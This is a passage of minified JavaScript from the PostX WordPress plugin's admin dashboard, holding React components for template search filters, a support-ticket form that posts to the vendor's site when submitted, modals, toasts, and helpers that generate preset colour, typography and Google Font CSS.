a=n(7294),r=n(4766),o=n(2402),i=n(7763),l=n(5324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:n,showWishList:s,_fetchFile:p,fetching:c,searchQuery:d,fields:u,fieldValue:m,fieldOptions:f,useState:h,useEffect:g,useRef:v}=e;return(0,a.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,a.createElement)("div",{className:"ultp-templatekit-search-container"},u?.filter&&(0,a.createElement)(a.Fragment,null," ",(0,a.createElement)("span",null,__("Filter:","ultimate-post")),(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:f?.filterArr||[]})),u?.trend&&m?.trend&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),u?.freePro&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,a.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,a.createElement)(o.Z,{changeStates:t,searchQuery:d}),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==n?"ultp-lay-active":""),onClick:()=>t("column","2")},i.Z.grid_col1),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==n?"ultp-lay-active":""),onClick:()=>t("column","3")},i.Z.grid_col2),(0,a.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,a.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},r.ZP[s?"love_solid":"love_line"])),p&&(0,a.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,a.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},58:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);n(3358);const{__}=wp.i18n,r=()=>(0,a.createElement)("input",{type:"file",name:"attachment",accept:"image/png, image/jpeg",className:"xpo-input-support",id:"xpo-support-file-input"}),o=()=>{const[e,t]=(0,a.useState)(!1),[n,o]=(0,a.useState)(!1),[i,l]=(0,a.useState)(!1),s=(0,a.useRef)(null),p=(0,a.useRef)(null);return(0,a.useEffect)((()=>{!e&&i&&l(!1)}),[e,i]),(0,a.useEffect)((()=>{const n=new AbortController;if(e)return document.addEventListener("mousedown",(e=>{s.current&&!s.current.contains(e.target)&&(t(!1),l(!1))}),{signal:n.signal}),()=>{n.abort()}}),[e]),(0,a.createElement)("div",{ref:s},(0,a.createElement)("span",{className:"xpo-support-pops-btn xpo-support-pops-btn--small "+(e?"xpo-support-pops-btn--big":""),onClick:()=>t((e=>!e)),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&t((e=>!e))}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"28",height:"28",fill:"none",viewBox:"0 0 28 28"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",fillRule:"evenodd",d:"M27.3 14c0 7.4-6 13.3-13.3 13.3H.7l3.9-3.9A13.3 13.3 0 0 1 14 .7c7.4 0 13.3 6 13.3 13.3Zm-19 1.7a1.7 1.7 0 1 0 0-3.4 1.7 1.7 0 0 0 0 3.4Zm7.4-1.7a1.7 1.7 0 1 1-3.4 0 1.7 1.7 0 0 1 3.4 0Zm5.6 0a1.7 1.7 0 1 1-3.3 0 1.7 1.7 0 0 1 3.3 0Z",clipRule:"evenodd"}))),e&&(0,a.createElement)("div",{className:`xpo-support-pops-container ${e?"xpo-support-entry-anim":""} ${i?"":"xpo-support-pops-container--full-height"}`},(0,a.createElement)("div",{className:"xpo-support-pops-header"},(0,a.createElement)("div",{style:{maxHeight:i?"0px":"140px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("div",{className:"xpo-support-header-bg"}),(0,a.createElement)("div",{className:"xpo-support-pops-avatars"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/1.png",alt:"WPXPO"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/2.jpg",alt:"A. Owadud Bhuiyan"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/3.jpg",alt:"Abdullah Al Mahmud"}),(0,a.createElement)("div",{className:"xpo-support-signal-green xpo-support-signal"})),(0,a.createElement)("div",{className:"xpo-support-pops-text"},"Questions? Create an Issue!"))),(0,a.createElement)("div",{className:"xpo-support-chat-body"},(0,a.createElement)("div",{style:{maxHeight:i?"174px":"0px",opacity:i?"1":"0",transition:"max-height 0.3s, opacity 0.3s"}},i&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"xpo-support-thankyou-icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"xpo-support-animation"},(0,a.createElement)("circle",{className:"xpo-support-circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"xpo-support-check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("div",{className:"xpo-support-thankyou-title"},__("Thank You!","ultimate-post")),(0,a.createElement)("div",{className:"xpo-support-thankyou-subtitle"},__("Your message has been received. We will contact you soon on your email with a response. Stay connected and check mail!","ultimate-post")))),(0,a.createElement)("form",{ref:p,onSubmit:e=>{if(n)return;e.preventDefault(),o(!0);const t=new FormData(e.target);fetch("https://wpxpo.com/wp-json/v2/support_mail",{method:"POST",body:t}).then((e=>{if(!e.ok)throw new Error("Failed to submit ticket");l(!0),p.current&&p.current.reset()})).catch((e=>{console.log(e)})).finally((()=>{o(!1)}))},encType:"multipart/form-data",style:{maxHeight:i?"0px":"376px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("input",{type:"hidden",name:"user_name",defaultValue:ultp_dashboard_pannel.userInfo.name}),(0,a.createElement)("input",{type:"email",name:"user_email",className:"xpo-input-support",defaultValue:ultp_dashboard_pannel.userInfo.email,required:!0}),(0,a.createElement)("input",{type:"hidden",name:"subject",value:"Support from PostX"}),(0,a.createElement)("div",{className:"xpo-support-title"},__("Message","ultimate-post")),(0,a.createElement)("textarea",{name:"desc",className:"xpo-input-support",placeholder:"Write your message here..."}),(0,a.createElement)(r,null),(0,a.createElement)("button",{type:"submit",className:"xpo-send-button",disabled:n},n?(0,a.createElement)(a.Fragment,null,"Sending",(0,a.createElement)("div",{className:"xpo-support-loading"})):(0,a.createElement)(a.Fragment,null,"Send",(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"21",height:"20",fill:"none",viewBox:"0 0 21 20"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",d:"M18.4 10c0-.6-.3-1.1-.8-1.4L5 2c-.6-.3-1.2-.3-1.7 0-.6.4-.9 1.3-.7 1.9l1.2 4.8c0 .5.5.8 1 .8h7c.3 0 .6.3.6.6 0 .4-.3.6-.6.6h-7c-.5 0-1 .4-1 .9l-1.3 4.8c-.1.6 0 1.1.5 1.5l.1.2c.5.4 1.2.4 1.8.1l12.5-6.6c.6-.3 1-.9 1-1.5Z"}))))))))}},1389:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(6509);const r=e=>{const{title:t,modalContent:n,setModalContent:r}=e;return(0,a.createElement)("div",{className:"ultp-dashboard-modal-wrapper",onClick:e=>{e.target?.closest(".ultp-dashboard-modal")||r("")}},(0,a.createElement)("div",{className:"ultp-dashboard-modal"},(0,a.createElement)("div",{className:"ultp-modal-header"},t&&(0,a.createElement)("span",{className:"ultp-modal-title"},t),(0,a.createElement)("a",{className:"ultp-popup-close",onClick:()=>r("")})),(0,a.createElement)("div",{className:"ultp-modal-body"},n)))}},8949:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(619);const r=e=>{const{type:t,size:n,loop:r,unit:o,c_s:i,classes:l}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:n?n+"px":"300px",height:n?n+"px":"300px"};break;case"title":e={width:`${n||"100"}${o||"%"}`};break;case"button":e={width:n?n+"px":"90px"};break;case"custom_size":e={width:`${i.size1?i.size1:"100"}${i.unit1?i.unit1:"%"}`,height:`${i.size2?i.size2:"20"}${i.unit2?i.unit2:"px"}`,borderRadius:i.br?i.br+"px":"0px"}}return e};return(0,a.createElement)(a.Fragment,null,r?(0,a.createElement)(a.Fragment,null,Array(parseInt(r)).fill("1").map(((e,n)=>(0,a.createElement)("div",{key:n,className:`ultp_skeleton__${t} ultp_frequency loop ${l||""}`,style:s()})))):(0,a.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${l||""}`,style:s()}))}},356:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2413);const{__}=wp.i18n,r=({delay:e,toastMessages:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!0),[i,l]=(0,a.useState)("show");return(0,a.useEffect)((()=>{const t=setTimeout((()=>{o(!1),l(""),n({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,a.createElement)("div",{className:"toast"},r&&t.status&&t.messages.length>0&&(0,a.createElement)("div",{className:"toastMessages"},t.messages.map(((e,r)=>(0,a.createElement)("span",{key:`toast_${Date.now().toString()}_${r}`},(0,a.createElement)("div",{className:`toaster ${i}`},(0,a.createElement)("span",null,"error"==t.status?(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,a.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("span",{className:"itmCenter"},e),(0,a.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let a=[...t.messages];a=a.filter(((t,n)=>n!==e)),n({...t,messages:a})})(r)},__("Close","ultimate-post"))))))))}},448:(e,t,n)=>{"use strict";n.d(t,{AJ:()=>o,cC:()=>l,x2:()=>r});var a=n(2030);const{__}=wp.i18n,r=(e,t,n,a)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:n}}).then((r=>{r.success&&("set"==e&&i(t,n),a&&a(r))}))},o=(e,t="",n=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((a,r)=>{if(!["rootCSS","globalColorCSS"].includes(a)){const r=a,o=t[a]?.hasOwnProperty("openColor")?"color"==t[a].type?t[a].color:t[a].gradient:t[a]||n||"";e+=`--postx_preset_${r}: ${o}; `}})),e+=" }",e}if("typoCSS"==e){const e=o("multipleTypos");let r="",i=":root { ";const l=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return Object.keys(t).forEach(((o,s)=>{const p=t[o],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(o);if(!["rootCSS","presetTypoCSS"].includes(o)&&"object"==typeof p&&Object.keys(p).length){const e=!l.includes(p.family),t=n?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!r.includes(p.family.replace(" ","+")+":")&&void 0!==a.Z&&(r+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(a.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(i+=p.family?`--postx_preset_${o}_font_family: ${p.family}; `:"",i+=p.family?`--postx_preset_${o}_font_family_type: ${p.type||"sans-serif"}; `:"",i+=p.weight?`--postx_preset_${o}_font_weight: ${p.weight}; `:"",i+=p.style?`--postx_preset_${o}_font_style: ${p.style}; `:"",i+=p.decoration?`--postx_preset_${o}_text_decoration: ${p.decoration}; `:"",i+=p.transform?`--postx_preset_${o}_text_transform: ${p.transform}; `:"",i+=p.spacing?.lg?`--postx_preset_${o}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",i+=p.spacing?.sm?`--postx_preset_${o}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",i+=p.spacing?.xs?`--postx_preset_${o}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),i+=p.size?.lg?`--postx_preset_${o}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",i+=p.size?.sm?`--postx_preset_${o}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",i+=p.size?.xs?`--postx_preset_${o}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",i+=p.height?.lg?`--postx_preset_${o}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",i+=p.height?.sm?`--postx_preset_${o}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",i+=p.height?.xs?`--postx_preset_${o}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),i+="}",r+i}if("font_load"==e){let e="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=n?ultp_dashboard_pannel:ultp_data,o=!((!r.settings?.hasOwnProperty("disable_google_font")||"yes"==r.settings.disable_google_font)&&r.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const n=!a.includes(t.family);o&&n&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let a="";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],o=n?ultp_dashboard_pannel:ultp_data,i=!((!o.settings?.hasOwnProperty("disable_google_font")||"yes"==o.settings.disable_google_font)&&o.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,n)=>{const o=!r.includes(e);i&&o&&e&&(a+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[n]+"'); ")})),a}if("bgCSS"==e){let e={};const n="object"==typeof t?{...t}:{};if("color"==n.type)e.backgroundColor=n.color;else if("gradient"==n.type&&n.gradient){let t=n.gradient;"object"==typeof n.gradient&&(t="linear"==n.gradient.type?"linear-gradient("+n.gradient.direction+"deg, "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);":"radial-gradient( circle at "+n.gradient.radial+" , "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==n.type){var r;(n.fallbackColor||n.color)&&(e.backgroundColor=null!==(r=n.fallbackColor)&&void 0!==r?r:n.color),n.image&&(e.backgroundImage='url("'+n.image+'")',n.position&&(e.backgroundPositionX=100*n.position.x+"%",e.backgroundPositionY=100*n.position.y+"%"),n.attachment&&(e.backgroundAttachments=n.attachment),n.repeat&&(e.backgroundRepeat=n.repeat),n.size&&(e.backgroundSize=n.size))}else"video"==n.type&&n.fallback&&(e.backgroundImage='url("'+n.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var n;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(n=e.fallbackColor)&&void 0!==n?n:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n                font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page 